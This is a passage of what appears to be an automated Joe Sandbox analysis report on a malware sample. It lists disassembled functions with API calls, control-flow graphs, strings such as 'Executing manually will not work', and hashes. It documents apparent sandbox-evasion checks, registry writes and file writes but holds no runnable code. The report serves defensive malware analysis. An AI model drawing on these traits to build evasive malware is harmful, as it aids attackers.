                                                                                                                                                                                                                                • Opcode ID: 24a8b62563874e9327889ce5f6c6d40886226817bcf6a558d56d713d1fc43888
                                                                                                                                                                                                                                • Instruction ID: 38168dc764e355c18afa7a55202d34cc2a4e9fc4f1829ec524cea1975df3b512
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 24a8b62563874e9327889ce5f6c6d40886226817bcf6a558d56d713d1fc43888
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92120F70A00219EFDB90DBA9CC95FEDBBF4BF48704F504096EA54EB291D770AA448F61
                                                                                                                                                                                                                                Function 0153FA51 Relevance: 18.2, APIs: 9, Strings: 3, Instructions: 151COMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 155 153fa51-153fa65 156 153fa71-153fa77 155->156 157 153fa79-153fa7c 156->157 158 153fa7e-153fa83 156->158 157->158 159 153fa67-153fa6f CharNextA 157->159 160 153fa92-153fa9a 158->160 161 153fa85-153fa8b 158->161 159->156 162 153faf7-153fafc 160->162 161->160 163 153fa8d-153fa90 161->163 164 153fafe-153fb1b call 1541369 162->164 165 153fa9c-153faa1 162->165 163->156 173 153fb98-153fb9d 164->173 166 153fae3-153faf5 CharNextA 165->166 167 153faa3-153faad CharNextA 165->167 166->162 169 153fac3-153fac9 167->169 171 153fad0-153fad5 169->171 172 153facb-153face 169->172 171->162 175 153fad7-153fae1 CharNextA 171->175 172->171 174 153faaf-153fac1 CharNextA 172->174 176 153fba3-153fbb4 173->176 177 153fb1d-153fb22 173->177 174->169 175->162 178 153fb74-153fb82 CharNextA 177->178 179 153fb24-153fb2e CharNextA 177->179 178->173 180 153fb84-153fb96 178->180 181 153fb54-153fb5a 179->181 180->173 180->180 182 153fb61-153fb66 181->182 183 153fb5c-153fb5f 181->183 182->173 185 153fb68-153fb72 CharNextA 182->185 183->182 184 153fb30-153fb3e CharNextA 183->184 184->181 186 153fb40-153fb52 184->186 185->173 186->181 186->186
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 0153FAA6
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,00000000), ref: 0153FAB2
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,00000000), ref: 0153FADA
                                                                                                                                                                                                                                • CharNextA.USER32(00000000), ref: 0153FAE6
                                                                                                                                                                                                                                • CharNextA.USER32(?,00000000), ref: 0153FB27
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000), ref: 0153FB33
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000), ref: 0153FB6B
                                                                                                                                                                                                                                • CharNextA.USER32(?,00000000), ref: 0153FB77
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharNext
                                                                                                                                                                                                                                • String ID: $"$"
                                                                                                                                                                                                                                • API String ID: 3213498283-938660540
                                                                                                                                                                                                                                • Opcode ID: 4a4277158661bad59ed7f520321bdf6c52cdd29acf458ec223851d448d85b30f
                                                                                                                                                                                                                                • Instruction ID: 4708cfcaf019a736e2fd2a5a84836ae4eb4259ac6f006c27c9fafd46d25a47ed
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a4277158661bad59ed7f520321bdf6c52cdd29acf458ec223851d448d85b30f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8F51D6B4A042829FD325DF6CC894A19FBE5FF9A350B640C5AE4C4CF312E375A881DB52
                                                                                                                                                                                                                                Function 0155A4E9 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 161windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,Executing manually will not work,0155A789,00000000), ref: 0155A54A
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,no data,0155A789,00000000), ref: 0155A5C2
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0155A65A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message$CountTick
                                                                                                                                                                                                                                • String ID: Executing manually will not work$TYQLVoFn$no data
                                                                                                                                                                                                                                • API String ID: 1431039135-2158577219
                                                                                                                                                                                                                                • Opcode ID: e3af6d9eea52ac4946b40bf0275076d504aa9fd8a7475b892ceb9297553fbf31
                                                                                                                                                                                                                                • Instruction ID: 7b038c6d047ee1bb3c9031a79a5ac0631561c8e4de89f0022c4dfcea6d19d618
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3af6d9eea52ac4946b40bf0275076d504aa9fd8a7475b892ceb9297553fbf31
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 246128386102078FC7A0EB54D4B0E8D77F6FB98308F618216ED216F759EB74AD099B61
                                                                                                                                                                                                                                Function 0155328D Relevance: 9.1, APIs: 6, Instructions: 106filewindowCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,015576DD,00000001,00000000,00000000,00000000), ref: 015532A9
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,015533C5,015533C1,00000000), ref: 015532C3
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,015576DD,00000001,00000000), ref: 015532CB
                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 015532ED
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,015533C9,015533C1,00000000), ref: 01553304
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,00000000,00000003,00000003,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 015533AE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Message$CloseCreateHandleReadSize
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2324011479-0
                                                                                                                                                                                                                                • Opcode ID: a05b98ea817b139b35555e90173f61b8a1b4fe19b5ed5b196522de2413724141
                                                                                                                                                                                                                                • Instruction ID: b8eb565ce4df937604c323363ad88246b53427df007b8af0c15c4a9ee41d4d14
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a05b98ea817b139b35555e90173f61b8a1b4fe19b5ed5b196522de2413724141
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D315A74744302AFD384EF29CC81F1AB7E5FFC8750F118929B9589B3A5DB70E8058A52
                                                                                                                                                                                                                                Function 015563E6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 380 15563e6-15563f0 381 1556380-15563ac 380->381 382 15563f3-1556415 GetModuleHandleA GetProcAddress GlobalMemoryStatusEx 380->382 383 15563c5 381->383 384 15563ae-15563bf 381->384 384->383
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,015567E0), ref: 015563FE
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 0155640B
                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,00000000,GlobalMemoryStatusEx,kernel32.dll,00000000,?,015567E0), ref: 01556411
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressGlobalHandleMemoryModuleProcStatus
                                                                                                                                                                                                                                • String ID: GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 2450578220-2840702992
                                                                                                                                                                                                                                • Opcode ID: a3a312ed9486be4f2e63f77b96369c3ca81e0c7f2df607656f50e1e524db43e0
                                                                                                                                                                                                                                • Instruction ID: 2155dda6d7c4bee4dd6e98fd11b9fb1422fe6307269cc85ec586627420ca7b0d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a3a312ed9486be4f2e63f77b96369c3ca81e0c7f2df607656f50e1e524db43e0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF062B4A04341CFDBA1DF69D4B85583BE2FB49350B920596EC24DF317E3349C049B20
                                                                                                                                                                                                                                Function 015563F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 14libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,015567E0), ref: 015563FE
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 0155640B
                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNELBASE(?,00000000,GlobalMemoryStatusEx,kernel32.dll,00000000,?,015567E0), ref: 01556411
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressGlobalHandleMemoryModuleProcStatus
                                                                                                                                                                                                                                • String ID: GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                                                                                                • API String ID: 2450578220-2840702992
                                                                                                                                                                                                                                • Opcode ID: 0a939b1789be170928ebd7f134ea6910aa28aeb1e0d22a4ddbb983e6c6abcdb5
                                                                                                                                                                                                                                • Instruction ID: 92892456013030e85fdc002c76acb7b97fa33b58fef50f025f0b82c39818fa60
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a939b1789be170928ebd7f134ea6910aa28aeb1e0d22a4ddbb983e6c6abcdb5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 97C09B713412727BF69031F61CD5CFE094DFC95559754057BFD14DE111D5A54D0001F1
                                                                                                                                                                                                                                Function 01556F35 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,01556FC4), ref: 01556F75
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,01556FC4), ref: 01556F84
                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,01556FC4), ref: 01556FA3
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 01556FA9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3919263394-0
                                                                                                                                                                                                                                • Opcode ID: 12210f717d8a2a3f62a65dfdbfea7c0aefffa40df6956e9679f9e8e9157914d8
                                                                                                                                                                                                                                • Instruction ID: 82f66bc323cc8e796193ee97b35566ab08d997f324195edb927281db029de2d8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12210f717d8a2a3f62a65dfdbfea7c0aefffa40df6956e9679f9e8e9157914d8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D7116D70A04216BFE750EF78DC92F5EB7ECFB58714FA14565B514EB1D0EA70AA008A10
                                                                                                                                                                                                                                Function 0155A369 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 235windowCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 405 155a369-155a412 406 155a413-155a436 405->406 407 155a48d 406->407 408 155a438-155a43e 406->408 407->406 411 155a48e-155a494 407->411 409 155a495-155a4a4 408->409 410 155a440-155a452 408->410 413 155a4a9-155a4ac 409->413 412 155a454-155a456 410->412 410->413 411->409 414 155a4ad-155a4bc 412->414 415 155a458-155a466 412->415 413->414 416 155a4bd-155a4c0 414->416 415->416 417 155a468-155a46a 415->417 418 155a4c1-155a4c8 416->418 417->418 419 155a46c-155a472 417->419 420 155a4c9-155a4cc 418->420 419->420 421 155a474-155a476 419->421 422 155a4cd-155a4d4 420->422 421->422 423 155a478-155a47e 421->423 424 155a4d5-155a4ec 422->424 423->424 425 155a480-155a489 423->425 426 155a4f1-155a4f6 424->426 425->407 426->426 427 155a4f8-155a53a call 1542e81 call 1556b2d call 1540df1 call 153fbb5 426->427 436 155a554-155a575 call 1556fd5 call 1540df1 427->436 437 155a53c-155a54f MessageBoxA 427->437 446 155a577-155a5a6 call 1544a31 call 1540df1 call 1556fd5 call 1540df1 436->446 447 155a5ab-155a5b2 436->447 439 155a71a-155a765 call 1540dc1 call 1541fc5 call 1540d9d call 1541fc5 call 1540dc1 437->439 446->447 451 155a5b4-155a5c7 MessageBoxA 447->451 452 155a5cc-155a6c5 call 1556e2d call 1540df1 call 155703d call 1540df1 call 1556e2d call 1540df1 call 155703d call 1540df1 GetTickCount call 1540285 call 155a175 call 155902d call 1558719 call 15513b1 call 1556cb5 447->452 451->439 493 155a6c7-155a6cc call 1557775 452->493 494 155a6d3-155a6f1 call 15513b1 call 1556cb5 452->494 497 155a6d1 493->497 503 155a6f3-155a709 call 15574f9 call 1559961 494->503 504 155a70b-155a710 call 1559bed 494->504 499 155a715 497->499 499->439 502 155a715 call 1559f2d 499->502 502->439 503->499 504->499
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,Executing manually will not work,0155A789,00000000), ref: 0155A54A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Message
                                                                                                                                                                                                                                • String ID: Executing manually will not work$TYQLVoFn
                                                                                                                                                                                                                                • API String ID: 2030045667-72810030
                                                                                                                                                                                                                                • Opcode ID: ad3ac2f2bb366ce6674e7825bdea143b2aca9de062735419bb20b7764221de9f
                                                                                                                                                                                                                                • Instruction ID: b5dfcbe60ddaa1d8512dffca7357823f7dab39693ed8215903bf117b258d0675
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad3ac2f2bb366ce6674e7825bdea143b2aca9de062735419bb20b7764221de9f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C71A530865349AFD7E19E61CC6DAFB3BBEFB81264B14405EFC048E141E3717A09DAA5
                                                                                                                                                                                                                                Function 015568F5 Relevance: 4.6, APIs: 3, Instructions: 57registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(?,00000000,00000000,00020119,?), ref: 0155693B
                                                                                                                                                                                                                                • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000100,?,00000000,00000000,00020119,?), ref: 01556962
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00020119,?), ref: 01556987
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3677997916-0
                                                                                                                                                                                                                                • Opcode ID: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
                                                                                                                                                                                                                                • Instruction ID: 17e9d00f5747afa7711ba62daa1379cbd672305205fb45b0a7a879fb61bb32ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 712d3af2663db280e53856c2e5cbdd465a33fd0d0744bc0e4c0c6c4841cc4760
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 28115275A0021E7BCB11EAD9DC81FEEB3BCBF98354F400566FA14DB240D770AA448BA0
                                                                                                                                                                                                                                Function 01556D19 Relevance: 4.6, APIs: 3, Instructions: 54fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 524 1556d19-1556d44 call 1541229 527 1556d87-1556d9c call 1540d9d 524->527 528 1556d46-1556d68 call 1541239 CreateFileA 524->528 528->527 533 1556d6a-1556d82 WriteFile CloseHandle 528->533 533->527
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D5E
                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D76
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,01556D9D), ref: 01556D82
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1065093856-0
                                                                                                                                                                                                                                • Opcode ID: 4d16d8840cc803dc2c851db0e10217e27e3826cdfe14633a8c2d00113f5d8cd9
                                                                                                                                                                                                                                • Instruction ID: e88462b89744014693f8ad5f997daeac8537de86c9a54dd30fa02d0b668fdea5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d16d8840cc803dc2c851db0e10217e27e3826cdfe14633a8c2d00113f5d8cd9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C012470A047567FE7509AA8CC92FBEB6ACFB85B14FA00675F910FB1D0D6706D004150
                                                                                                                                                                                                                                Function 01558CCD Relevance: 3.1, APIs: 2, Instructions: 94registryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,01558DD2), ref: 01558D47
                                                                                                                                                                                                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,01558DD2), ref: 01558D7B
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateOpen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 436179556-0
                                                                                                                                                                                                                                • Opcode ID: 6057284e5bbcf6a4c3365dbc32df66d0809416339f3c86c0c541e20346297c06
                                                                                                                                                                                                                                • Instruction ID: 11e1652ffa43ce3cd6db81920f60f0674de64dba709383d034a6770654b8ced0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6057284e5bbcf6a4c3365dbc32df66d0809416339f3c86c0c541e20346297c06
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F631C470A0420ABFDB51DBA6CC50BDEB7FCBF54304F5484B6E911EB280D775AA088740
                                                                                                                                                                                                                                Function 01556F2A Relevance: 3.0, APIs: 2, Instructions: 24fileCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,01556FC4), ref: 01556FA3
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 01556FA9
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseFileHandleRead
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2331702139-0
                                                                                                                                                                                                                                • Opcode ID: 0b32f6d4fc82639a93192d05476157a2f092e9cfee2ccd6f6b37f76794bbbfd4
                                                                                                                                                                                                                                • Instruction ID: a0a14e71b2d1d6de013e2177f6ff50d27525d7d9b8ccaeee4088f1ad84ab36d7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b32f6d4fc82639a93192d05476157a2f092e9cfee2ccd6f6b37f76794bbbfd4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EFE04F75908106BFE744EBA4DC91EADB3FCFF98300FE04466B455DB144DA30A9048B20
                                                                                                                                                                                                                                Function 015568C1 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,?,01559095,00000000,015591FC,?,?,00000000,00000000), ref: 015568CD
                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,?,?,01559095,00000000,015591FC,?,?,00000000,00000000), ref: 015568EA
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                • Opcode ID: 150071e8d115d48b6e860e46511f068db359f69ce08f9d5d34f1670f96483210
                                                                                                                                                                                                                                • Instruction ID: 89fd308bdb5d05edce58c2cebc6fee462c991318497c1a7138e02d8b61206e0f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 150071e8d115d48b6e860e46511f068db359f69ce08f9d5d34f1670f96483210
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1D0A9E0B00A331BCBA031BC0CD9B4E00CC3BA9278B500302FA28DF2D1DA78CC9202A0
                                                                                                                                                                                                                                Function 01559F2D Relevance: 3.0, APIs: 2, Instructions: 5COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,0155A28D,00000000,0155A2A8,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01559F2F
                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000,00000000,0155A28D,00000000,0155A2A8,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 01559F35
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CurrentTerminate
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2429186680-0
                                                                                                                                                                                                                                • Opcode ID: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
                                                                                                                                                                                                                                • Instruction ID: b964ec3b88afc478fd0aaeb80557f07df5d9e8f5f914bb390619e79cb2b602c4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b11399cddf9350ece28e91c1209740a3cf97649afd2b7b8c8d81269606c38880
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA90026954C22312D8D032B01C4DB0918383BE1A49FC115C051085D4E0F87990004421
                                                                                                                                                                                                                                Function 0153E3CD Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,0153E760), ref: 0153E3FC
                                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,0153E760), ref: 0153E423
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 0000000C.00000002.1643726691.000000000153B000.00000040.00000020.00020000.00000000.sdmp, Offset: 0153B000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_12_2_153b000_7LUEA3.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2087232378-0
                                                                                                                                                                                                                                • Opcode ID: e4486c620871cc4d06bb44b0b308f8b8550578f222fcde89f9a124b91a91108f
                                                                                                                                                                                                                                • Instruction ID: cd927669242ca67cf115fef2539ee1d1451137c6496af9e5fc9f50f8e0d5ab45
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4486c620871cc4d06bb44b0b308f8b8550578f222fcde89f9a124b91a91108f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18F02773F0022256EB21596C4CC2B965BC5FFC9B90F044070FA0CEF3C9C6A15C0142A0
                                                                                                                                                                                                                                Function 01553A35 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
